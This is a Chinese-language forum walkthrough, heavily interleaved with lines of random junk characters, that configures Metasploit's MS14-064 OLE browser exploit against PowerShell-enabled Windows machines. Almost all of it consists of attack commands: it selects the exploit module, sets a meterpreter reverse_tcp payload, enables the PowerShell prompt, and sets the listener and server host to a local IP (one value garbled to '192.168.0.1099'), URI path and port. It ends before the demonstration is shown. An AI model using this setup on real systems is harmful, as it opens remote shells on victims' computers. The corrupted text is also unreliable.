( N( l# p- D# i- l: g( g/ C4 d
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示, s3 H7 _. `. {# h3 c% B0 `! B. [1 Q
8 c& ~/ u6 L$ E+ W
! e5 l! n C6 k
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
8 l! @2 S1 g' ^% \
, G2 u- |' g# K7 z" E1 ?
Z3 t9 b: I6 ^# p( l( A0 S3 P5 N, v6 P 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
# `4 ]/ L7 m9 h- \' @2 p1 t4 ]
. X- \6 T6 V i2 J6 u2 R( o
: E9 w5 l) G* E8 K8 B- |+ ^/ \. F5 q set AllowPowershellPrompt true
3 b1 j- o' u% F+ r5 i0 g0 f
7 C" Y8 ]3 K, u) P2 |8 `5 J. `) Y
/ ^" B; L" L3 b5 C
Set LHOST 192.168.0.1099 r. G, u- x9 w
& Z1 Q0 C) X' g; |. u, O& Q$ j% F2 c! I8 @! {5 i( l
set SRVHOST 192.168.0.109 W( I7 c! c; A* @# z; J+ N4 W' u
/ C, i$ ^/ N4 f7 y. [, C6 j. k
& o) c. E7 ]" p9 J Set uripath share
+ f0 h: l' z& N( D
! {. H% e2 U' |/ U' n( X
7 {1 G$ h: [# k- W$ j
Set srvport 80
* n) e2 z' w, H
- ]1 ]. I3 D( b9 ]" S
3 n, d4 C- x: g/ S
2 z! r; a; D7 V; I" E/ B: R: K e
# M5 j# }- I5 R3 `; }1 |% z8 D6 V$ F% k0 }. @" n7 e
' J. ~; k+ L2 W4 m+ W9 x
* a; A1 g# N# }3 o3 L' P3 N6 E7 \) V: J% j7 j2 t% J9 f2 u. L& E
0 M5 v0 d6 J- H, C
$ D- Q+ I8 W3 o9 r. w
# i& t2 F1 P" d6 h7 R" b8 r
2 s* ^: ]4 H+ }
) T5 l5 ^& r, f3 @1 Z2 U2 Q) Z4 ]
7 @5 k8 V3 ^3 C* [8 N
) R1 ?$ }7 a2 h: s5 J7 \
6 {$ J5 N, A8 \/ s 下面我们来访问本地地址如图:" p5 b, ]" `0 I- b' W
% Q; J0 d9 n) K Q v) G6 e
$ o( [% Y) C" _" T8 G
& C: }: w2 r2 p# X
* l7 n' H9 f5 Z
1 d! v" N; v: b# u5 F 9 A0 e3 x# r) z& f4 k
^6 B4 K; A8 ]# X: {
( A, K+ i# T7 q
6 g$ F+ u) p( x. h5 e) s